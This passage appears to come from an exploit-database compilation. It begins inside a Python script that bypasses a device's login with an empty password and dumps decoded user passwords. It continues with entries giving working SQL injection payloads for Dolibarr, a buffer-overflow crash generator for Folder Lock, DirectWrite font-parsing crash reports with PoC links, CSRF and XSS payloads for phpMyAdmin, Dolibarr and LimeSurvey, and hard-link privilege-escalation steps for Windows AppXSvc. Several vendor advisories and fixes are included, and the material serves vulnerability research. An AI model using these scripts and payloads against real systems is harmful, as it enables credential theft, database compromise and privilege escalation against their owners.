    if encpass.startswith('#_'):
        encpass = encpass.split('_')[2]
    coded = base64.b64decode(encpass)
    codedhex = binascii.hexlify(coded)[:-4]  # strip the trailing 2 bytes (purpose not shown here; presumably a checksum/terminator)
    clearpass = binascii.unhexlify(convertPass(codedhex))
    print('Decoded password: ' + clearpass)

def getUserData(userid, strIP):
    """Fetch and decode the credentials of user slot `userid` from the device at `strIP`.

    Posts a wsdList request to /wrcgi.bin/wsdReadForm with an Authorization header built from
    the username and an EMPTY password ("adm:") -- this is the authentication-bypass half of
    the chain. Prints the user's name and decoded password when the reply has the expected
    20 fields and a non-empty login.
    NOTE(review): every path returns True, so the caller's "not getUserData(...)" branch can never
    run; the empty-username case (and the malformed-reply case) probably meant to return False.
    """
    postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
    postwsdlist = postwsdlist.replace('|1','|'+str(userid))  # "|1" is the user index placeholder
    postdata = {'wsdList' : postwsdlist}
    # base64("adm:") with the "=" padding stripped; note the leading space in ' Basic ' below.
    b64auth = base64.b64encode(username+':').replace('=','')
    result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
    resultarr = result.split('","')  # crude split of the JSON-ish reply; field order follows postwsdlist
    if len(resultarr) == 20:
        fname = str(resultarr[1])
        lname = str(resultarr[2])
        usern = str(resultarr[3])
        if len(usern) == 0:
            return True  # empty slot
        encpassword = resultarr[4]
        print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ')
        decode(encpassword)
        print('---')
        return True
    else:
        return True  # unexpected reply shape; silently skipped

# Interactive entry point: ask for the device IP, then walk user slots 0..19.
strIP = raw_input('Please enter an IP [10.0.0.53]: ')
if strIP == '':
    strIP = '10.0.0.53'
print('---')
for i in range(20):
    # Unreachable with the current getUserData() (always True); see the note on that function.
    if not getUserData(i, strIP):
        print('### That\'s all folks ;-) ###')
        raw_input()
        exit(0)
raw_input('All Done')
  8. # Exploit Title: Dolibarr ERP/CRM - elemid SQL Injection # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== elemid (POST) - SQL injection PoC Note: the request below carries a DOLSESSID session cookie and a CSRF token, so this appears to be a post-authentication issue reachable by a user who can open the category page; the token is session-bound and must be replaced with a fresh one from the page when reproducing. POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php Content-Type: application/x-www-form-urlencoded Content-Length: 143 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi] Parameter: elemid (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT (ELT(7549=7549,1))),0x7176787a71)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn) Fix: treat elemid as an integer (cast/validate) and pass it as a bound parameter rather than interpolating it into the query.
  9. # Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit # Date: 12.09.2019 # Vendor Homepage:https://www.newsoftwares.net/folderlock/ # Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe # Exploit Author: Achilles # Tested Version: 7.7.9 # Tested on: Windows 7 x64 # 1.- Run python code :Folder_Lock.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Folderlock and Click 'Enter Key' # 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key' # 5.- Click 'Submit' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  10. Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as web browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!sfac_GetSbitBitmap, while rasterizing the glyphs of a slightly malformed TrueType font. The problem reproduces in Microsoft Edge (supposedly not in Chrome and Firefox due to OpenType Sanitizer); below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (4368.698c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] ds:000001b9`94823000=?? 
0:036> u DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] 00007ffe`b1ce47c2 0811 or byte ptr [rcx],dl 00007ffe`b1ce47c4 49ffc5 inc r13 00007ffe`b1ce47c7 48ffc1 inc rcx 00007ffe`b1ce47ca 66413bc3 cmp ax,r11w 00007ffe`b1ce47ce 7471 je DWrite!sfac_GetSbitBitmap+0x331 (00007ffe`b1ce4841) 00007ffe`b1ce47d0 66ffc0 inc ax 00007ffe`b1ce47d3 ebd1 jmp DWrite!sfac_GetSbitBitmap+0x296 (00007ffe`b1ce47a6) 0:036> k # Child-SP RetAddr Call Site 00 000000a3`a00ec740 00007ffe`b1ce3aaa DWrite!sfac_GetSbitBitmap+0x2ad 01 000000a3`a00ec840 00007ffe`b1ce3954 DWrite!GetSbitComponent+0xfe 02 000000a3`a00ec950 00007ffe`b1d4cc66 DWrite!sbit_GetBitmap+0xd0 03 000000a3`a00eca10 00007ffe`b1d43dfe DWrite!fs_ContourScan+0x3b6 04 000000a3`a00ecaf0 00007ffe`b1d43e98 DWrite!TrueTypeRasterizer::Implementation::GetBitmapInternal+0xe6 05 000000a3`a00ecb40 00007ffe`b1d42c03 DWrite!TrueTypeRasterizer::Implementation::GetBitmap+0x30 06 000000a3`a00ecbb0 00007ffe`b1d11754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x8b 07 000000a3`a00ecbf0 00007ffe`bf4de1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 08 000000a3`a00ece60 00007ffe`bf4de95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 09 000000a3`a00ecf10 00007ffe`bf4e60b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 0a 000000a3`a00ecf60 00007ffe`bf4f572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 0b 000000a3`a00ed0a0 00007ffe`bf55ffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 0c 000000a3`a00ed3b0 00007ffe`bf4f379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 0d 000000a3`a00ed4c0 00007ffe`bf50e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 0e 000000a3`a00ed570 00007ffe`bf50a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 0f 000000a3`a00ed600 00007ffe`bf50143b d2d1!DrawingContext::Flush+0x96 10 000000a3`a00ed660 00007ffe`99d3551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 11 000000a3`a00ed7a0 00007ffe`99bca704 
edgehtml!CDXRenderTarget::EndDrawD2D+0x66 12 000000a3`a00ed7d0 00007ffe`99bca4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 13 000000a3`a00ed800 00007ffe`99d2db85 edgehtml!CDXRenderTarget::EndDraw+0x38 14 000000a3`a00ed850 00007ffe`99d2da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 15 000000a3`a00ed8f0 00007ffe`99bb585f edgehtml!CDispNodeDestination::EndRender+0x6b 16 000000a3`a00ed960 00007ffe`99cf60c1 edgehtml!CDispNodeDestination::EndRect+0xaf 17 000000a3`a00ed9a0 00007ffe`99bacf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 18 000000a3`a00ed9d0 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x583 19 000000a3`a00edb40 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 1a 000000a3`a00edcd0 00007ffe`99baee43 edgehtml!CDispNode::DrawInternal+0x7ce 1b 000000a3`a00ee060 00007ffe`99bad747 edgehtml!CDispNode::Draw+0x943 1c 000000a3`a00ee270 00007ffe`99bad297 edgehtml!CDispContainer::DrawChildren+0x227 1d 000000a3`a00ee330 00007ffe`99bacbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 1e 000000a3`a00ee420 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 1f 000000a3`a00ee590 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 20 000000a3`a00ee720 00007ffe`99baead3 edgehtml!CDispNode::DrawInternal+0x7ce 21 000000a3`a00eeab0 00007ffe`99bba8fc edgehtml!CDispNode::Draw+0x5d3 22 000000a3`a00eecc0 00007ffe`99bb9b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 23 000000a3`a00eedb0 00007ffe`99bb97f5 edgehtml!CDispRoot::DrawRoot+0x1b8 24 000000a3`a00ef000 00007ffe`99c3452c edgehtml!CPaintHandler::RenderInternal+0x2b5 25 000000a3`a00ef580 00007ffe`99b54ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 26 000000a3`a00ef5f0 00007ffe`99d3a80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 27 000000a3`a00ef650 00007ffe`99c5fdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 28 000000a3`a00ef6c0 00007ffe`99d77542 edgehtml!CRenderThread::RenderThread+0x229 29 000000a3`a00ef760 
00007ffe`c32937e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 2a 000000a3`a00ef790 00007ffe`c5e1cb81 KERNEL32!BaseThreadInitThunk+0x14 2b 000000a3`a00ef7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test cases to a 1-byte difference in the EBLC table, and a 2-byte difference in the EBDT table in relation to the original files. The issue reproduces on a fully updated Windows 10 1709; we haven't tested other versions of the system. It could be used to disclose sensitive data from the process address space, which is clearly visible when opening the PoC HTML files in Edge. In most cases, instead of crashing, the browser will display random chunks of heap memory residing after the glyph's bitmap allocation. As shown in 1/poc.html and 2/poc.html, the problems are related to glyphs corresponding to characters with codes 0xF0 and 0x2020, respectively. Attached is a pair of minimized PoC fonts, original fonts, and HTML files to reproduce the bug in a browser. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip
  11. Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as the Chrome, Firefox and Edge browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!SplicePixel, while rasterizing the glyphs of a slightly malformed OpenType font. The problem reproduces in all major browsers; below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (281c.25d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] ds:00000227`c62d95b0=???????????????? 0:031> u DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] 00007fff`b8634477 4885d2 test rdx,rdx 00007fff`b863447a 7474 je DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b863447c 458d4b01 lea r9d,[r11+1] 00007fff`b8634480 8b4208 mov eax,dword ptr [rdx+8] 00007fff`b8634483 413bc1 cmp eax,r9d 00007fff`b8634486 7f68 jg DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b8634488 488b0a mov rcx,qword ptr [rdx] 0:031> ? rax Evaluate expression: 2369851854688 = 00000227`c62d8f60 0:031> ? rsi Evaluate expression: 202 = 00000000`000000ca 0:031> dd rax 00000227`c62d8f60 ???????? ???????? ???????? ???????? 00000227`c62d8f70 ???????? ???????? ???????? ???????? 00000227`c62d8f80 ???????? ???????? ???????? ???????? 00000227`c62d8f90 ???????? ???????? ???????? ???????? 00000227`c62d8fa0 ???????? ???????? ???????? ???????? 00000227`c62d8fb0 ???????? ???????? ???????? ???????? 
00000227`c62d8fc0 ???????? ???????? ???????? ???????? 00000227`c62d8fd0 ???????? ???????? ???????? ???????? 0:031> k # Child-SP RetAddr Call Site 00 000000b4`ceaebe00 00007fff`b8634306 DWrite!SplicePixel+0x14b 01 000000b4`ceaebe50 00007fff`b8633325 DWrite!SetPixelInDropOut+0x9a 02 000000b4`ceaebe90 00007fff`b86322a8 DWrite!FillInInflection+0xcd 03 000000b4`ceaebf00 00007fff`b863281b DWrite!DoXInflections+0x118 04 000000b4`ceaebf40 00007fff`b86319ca DWrite!EditBlackSpace+0x29f 05 000000b4`ceaebfa0 00007fff`b8636118 DWrite!CScan+0x72 06 000000b4`ceaebff0 00007fff`b855b1b2 DWrite!CScanFill+0x204 07 000000b4`ceaec0e0 00007fff`b848ccef DWrite!DoType1InterpretCharString+0xcd77a 08 000000b4`ceaec790 00007fff`b862ea16 DWrite!Type1InterpretCharString+0x163 09 000000b4`ceaec880 00007fff`b862dd49 DWrite!BuildRuns+0x186 0a 000000b4`ceaec9b0 00007fff`b862b2b9 DWrite!ATMBuildBitMap+0xb9 0b 000000b4`ceaeca80 00007fff`b85b88b7 DWrite!AdobeInternalGetBitmap+0x31d 0c 000000b4`ceaecd20 00007fff`b85b877a DWrite!CffRasterizer::Implementation::GetBitmap+0x11f 0d 000000b4`ceaece60 00007fff`b84e2c89 DWrite!CffRasterizer::GetBitmap+0x2a 0e 000000b4`ceaecea0 00007fff`b84b1754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x111 0f 000000b4`ceaecee0 00007fff`c8e3e1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 10 000000b4`ceaed150 00007fff`c8e3e95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 11 000000b4`ceaed200 00007fff`c8e460b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 12 000000b4`ceaed250 00007fff`c8e5572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 13 000000b4`ceaed390 00007fff`c8ebffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 14 000000b4`ceaed6a0 00007fff`c8e5379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 15 000000b4`ceaed7b0 00007fff`c8e6e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 16 000000b4`ceaed860 00007fff`c8e6a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 17 000000b4`ceaed8f0 00007fff`c8e6143b 
d2d1!DrawingContext::Flush+0x96 18 000000b4`ceaed950 00007fff`9dba551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 19 000000b4`ceaeda90 00007fff`9da3a704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66 1a 000000b4`ceaedac0 00007fff`9da3a4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 1b 000000b4`ceaedaf0 00007fff`9db9db85 edgehtml!CDXRenderTarget::EndDraw+0x38 1c 000000b4`ceaedb40 00007fff`9db9da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 1d 000000b4`ceaedbe0 00007fff`9da2585f edgehtml!CDispNodeDestination::EndRender+0x6b 1e 000000b4`ceaedc50 00007fff`9db660c1 edgehtml!CDispNodeDestination::EndRect+0xaf 1f 000000b4`ceaedc90 00007fff`9da1cf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 20 000000b4`ceaedcc0 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x583 21 000000b4`ceaede30 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 22 000000b4`ceaedfc0 00007fff`9da1ee43 edgehtml!CDispNode::DrawInternal+0x7ce 23 000000b4`ceaee350 00007fff`9da1d747 edgehtml!CDispNode::Draw+0x943 24 000000b4`ceaee560 00007fff`9da1d297 edgehtml!CDispContainer::DrawChildren+0x227 25 000000b4`ceaee620 00007fff`9da1cbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 26 000000b4`ceaee710 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 27 000000b4`ceaee880 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 28 000000b4`ceaeea10 00007fff`9da1ead3 edgehtml!CDispNode::DrawInternal+0x7ce 29 000000b4`ceaeeda0 00007fff`9da2a8fc edgehtml!CDispNode::Draw+0x5d3 2a 000000b4`ceaeefb0 00007fff`9da29b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 2b 000000b4`ceaef0a0 00007fff`9da297f5 edgehtml!CDispRoot::DrawRoot+0x1b8 2c 000000b4`ceaef2f0 00007fff`9daa452c edgehtml!CPaintHandler::RenderInternal+0x2b5 2d 000000b4`ceaef870 00007fff`9d9c4ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 2e 000000b4`ceaef8e0 00007fff`9dbaa80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 
2f 000000b4`ceaef940 00007fff`9dacfdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 30 000000b4`ceaef9b0 00007fff`9dbe7542 edgehtml!CRenderThread::RenderThread+0x229 31 000000b4`ceaefa50 00007fff`cec537e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 32 000000b4`ceaefa80 00007fff`cf5bcb81 KERNEL32!BaseThreadInitThunk+0x14 33 000000b4`ceaefab0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test case to a single-byte difference in relation to the original file. When decompiled with the "ttx" utility from the fontTools package, the difference becomes obvious: it's a change of one of the FontMatrix values inside the CFF table. Original data: <FontMatrix value="0.001 0.0 0.000123 0.001 0.0 0.0"/> Mutated data: <FontMatrix value="0.001 2000000.0 0.000123 0.001 0.0 0.0"/> The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven't tested other versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are the minimized PoC font, original font, an HTML file to reproduce the bug in a browser, and 3 extra non-minimized samples which also trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip
  12. ============================================= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised: September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 ============================================= I. VULNERABILITY ------------------------- phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery II. BACKGROUND ------------------------- phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. III. DESCRIPTION ------------------------- A Cross-Site Request Forgery vulnerability has been detected in phpMyAdmin: the "remove server" action of the Setup page is performed by a plain GET request that carries no anti-CSRF token, so an attacker can make an authenticated phpMyAdmin user delete any configured server simply by getting their browser to load a crafted URL. IV. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server <p>Deleting Server 1</p> <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" /> V. BUSINESS IMPACT ------------------------- The attacker can easily craft a hyperlink (or, as above, a hidden image) containing the request to be executed on behalf of the victim; because the state-changing action is exposed over GET and is not token-protected, the browser sends it together with the victim's phpMyAdmin session cookie. VI. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1 VII. SOLUTION ------------------------- Require and validate the anti-CSRF token on this request, as is already done for other phpMyAdmin requests, and move the state-changing action from GET to POST. VIII. REFERENCES ------------------------- https://www.phpmyadmin.net/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- June 13, 2019 1: Initial release September 13, 2019 2: Last revision XI. 
  DISCLOSURE TIMELINE ------------------------- June 13, 2019 1: Vulnerability discovered by Manuel Garcia Cardenas June 13, 2019 2: Sent to vendor July 16, 2019 3: Follow-up request to vendor; no fix date given September 13, 2019 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester
  13. # Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # CVE: CVE-2019-16197 # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS. Note that a browser does not let a web page set the victim's User-Agent header, so the reflected request below only demonstrates the injection against the requester's own session; exploitability against other users depends on whether the same value is also stored and rendered elsewhere (e.g. in log or session views), which is not shown here. The fix is to HTML-encode the header value before it is written into the page. GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
  14. SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > ======================================================================= title: Stored and reflected XSS vulnerabilities product: LimeSurvey vulnerable version: <= 3.17.13 fixed version: =>3.17.14 CVE number: CVE-2019-16172, CVE-2019-16173 impact: medium homepage: https://www.limesurvey.org/ found: 2019-08-23 by: Andreas Kolbeck (Office Munich) David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals." Source: https://www.limesurvey.org/ Business recommendation: ------------------------ LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected. Vulnerability overview/description: ----------------------------------- 1) Stored and reflected XSS vulnerabilities LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, which allows an attacker to execute JavaScript code with the permissions of the victim. 
  In this way it is possible to escalate privileges from a low-privileged account e.g. to "SuperAdmin". Proof of concept: ----------------- 1) Stored and reflected XSS vulnerabilities Example 1 - Stored XSS (CVE-2019-16172): The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example: test<svg/onload=alert(document.cookie)> When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message. Example 2 - Reflected XSS (CVE-2019-16173): The following proof of concept displays document.cookie, which includes the CSRF token cookie (only cookies not flagged HttpOnly are readable this way, so whether the session cookie itself is exposed depends on the deployment). The parameter "surveyid" is not filtered properly: http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question If the URL schema is configured differently the following payload works: http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well. 
Vendor contact timeline: ------------------------ 2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 2019-09-02: Fixes available: https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues 2019-09-03: Release of LimeSurvey v3.17.15 bug fix 2019-09-12: Coordinated release of security advisory Solution: --------- Update to version 3.17.15 or higher: https://www.limesurvey.org/stable-release The vendor provides a detailed list of changes here: https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? 
Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Kolbeck / @2019
  15. #-----------------------------------------------------------------------------# # Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) # # Date: Sep 4 2019 # # Exploit Author: Gabor Seljan # # Vendor Homepage: https://www.microsoft.com/ # # Version: 17763.1.amd64fre.rs5_release.180914-1434 # # Tested on: Windows 10 Version 1809 for x64-based Systems # # CVE: CVE-2019-1253 # #-----------------------------------------------------------------------------# Summary: AppXSvc improperly handles file hard links resulting in a low privileged user being able to take 'Full Control' of an arbitrary file leading to elevation of privilege. Description: An elevation of privilege vulnerability exists when the AppX Deployment Server (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that modifies the security descriptor of the files. Further analyzis revealed that the restore operation can be triggered on demand by preventing AppXSvc from accessing the settings.dat[.LOGx] files. This can be achieved by locking the settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation' errors when Edge and AppXSvc are trying to access it. Eventually the restore operation kicks in and if the settings.dat[.LOGx] file has been replaced with a hard link AppXSvc will overwrite the security descriptor of the target file. A low privileged user can leverage this vulnerability to take 'Full Control' of an arbitrary file. Steps to reproduce: 1. Terminate Edge. 2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini. 3. Open the hard link for reading and lock the file. 4. Start Edge and wait a few seconds for the restore operation to kick in. 5. Unlock the file and close the file handle. Expected result: Full access (GENERIC_ALL) to C:\Windows\win.ini is denied. 
